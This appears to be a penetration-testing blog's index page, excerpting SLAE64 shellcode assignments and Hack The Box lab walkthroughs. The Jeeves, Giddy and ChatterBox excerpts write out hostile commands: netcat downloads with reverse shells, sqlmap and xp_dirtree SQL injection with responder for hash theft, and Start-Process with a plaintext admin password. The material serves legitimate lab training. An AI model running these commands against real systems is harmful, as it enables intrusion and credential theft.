This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https://www.pentesteracademy.com/course?id=7
Student-ID: PA-15847
The Objectives for the Assignment:
– create a custom encoding scheme like the Insertion Encoder
– PoC with execve stack as the shellcode to encode with your scheme and execute
So we used the following python… Continue reading SLAE64: Assignment 4 – Custom Encoder
Author: admin
SLAE64: Assignment 3 – Egghunters
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https://www.pentesteracademy.com/course?id=7
Student-ID: PA-15847
The Objectives for the Assignment:
– study about egg hunter shellcode
– create a working demo of the egghunter
– should be configurable for different payloads
An Egg Hunter is the first stage of a multistage payload. It consists of… Continue reading SLAE64: Assignment 3 – Egghunters
SLAE64: Assignment 2 – Reverse Shell
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https://www.pentesteracademy.com/course?id=7
Student-ID: PA-15847
The Objectives for the Assignment:
– create a shell_reverse_tcp shellcode:
– reverse connects to configured IP and port
– needs a passcode
– if passcode is correct, then execs shell
– remove 0x00 from bind tcp shellcode
So I took… Continue reading SLAE64: Assignment 2 – Reverse Shell
SLAE64: Assignment 1 – Bind Shell
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https://www.pentesteracademy.com/course?id=7
Student-ID: PA-15847
The Objectives for the Assignment:
– create a shell_bind_tcp shellcode
– binds to a port
– needs a passcode
– if passcode is correct, then execs shell
– remove 0x00 from bind tcp shellcode
So I took the code… Continue reading SLAE64: Assignment 1 – Bind Shell
HTB – Arctic Walkthrough
nmap
Port 8500 – ColdFusion
ColdFusion File Inclusion
https://www.exploit-db.com/exploits/14641
Hash Crack
JSP Shell Creation & File Upload & Shell
Run the task and open the file in the following directory: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
Privilege escalation
Python exploit suggester
Upload ms10-059.exe (Chimichurri) via Powershell
Get an admin shell with the exe file.
HTB – NetMon Walkthrough
nmap
Anonymous FTP
PRTG files are under C:\ProgramData\Paessler\PRTG Network Manager
Looking for password
The version of PRTG is vulnerable
Use the following exploit: https://raw.githubusercontent.com/wildkindcc/CVE-2018-9276/master/CVE-2018-9276.py
I got NT Authority\System
HTB – Tenten Walkthrough
nmap
WPScan – enumerate users
WPScan – Plugin Vulnerability (IDOR) found
https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
As the PoC explained in the above URL, I tried to upload CV files first. Since wp saves the uploaded files as /wp-content/uploads/{year}/{month}/{file name}, I checked if the file I uploaded exists, and yes, it's uploaded. Also in the HTML code of the application page, I… Continue reading HTB – Tenten Walkthrough
HTB – Jeeves Walkthrough
nmap
gobuster
Jenkins Code Execution
Create a project on Jenkins
Low Privileged Shell
Enter commands under Build Section
Powershell wget "http://10.10.14.4:8000/nc.exe" -outfile "nc.exe"
nc.exe 10.10.14.4 7777 -e cmd.exe
And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell
Meterpreter Shell
Create a… Continue reading HTB – Jeeves Walkthrough
HTB – Giddy Walkthrough
nmap
gobuster
Search field – SQL error
SQL Injection
You can use the cheatsheet of PentestMonkey
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
or you can use sqlmap
sqlmap --url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 --dbms=mssql --dbs
databases
current user
sqlmap --url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 --dbms=mssql --current-user
Capture MSSQL credentials with xp_dirtree, smbserver.py
The following blog post explains the process very well
https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478
=1; EXEC MASTER.sys.xp_dirtree '\\yourIP\something'
listen with responder to steal the user hash
responder -I tun0… Continue reading HTB – Giddy Walkthrough
HTB – ChatterBox Walkthrough
nmap
Exploit
Create a shell with msfvenom as described in the exploit
Get the exploit from searchsploit or exploitdb
Shell
Privilege Escalation
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.16:8000/nc.exe','C:\Users\Alfred\Desktop\nc.exe')
$username = 'administrator'
$password = 'Welcome1!'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList '-e cmd.exe 10.10.14.16 1234' -Credential $credential
And we get an admin… Continue reading HTB – ChatterBox Walkthrough
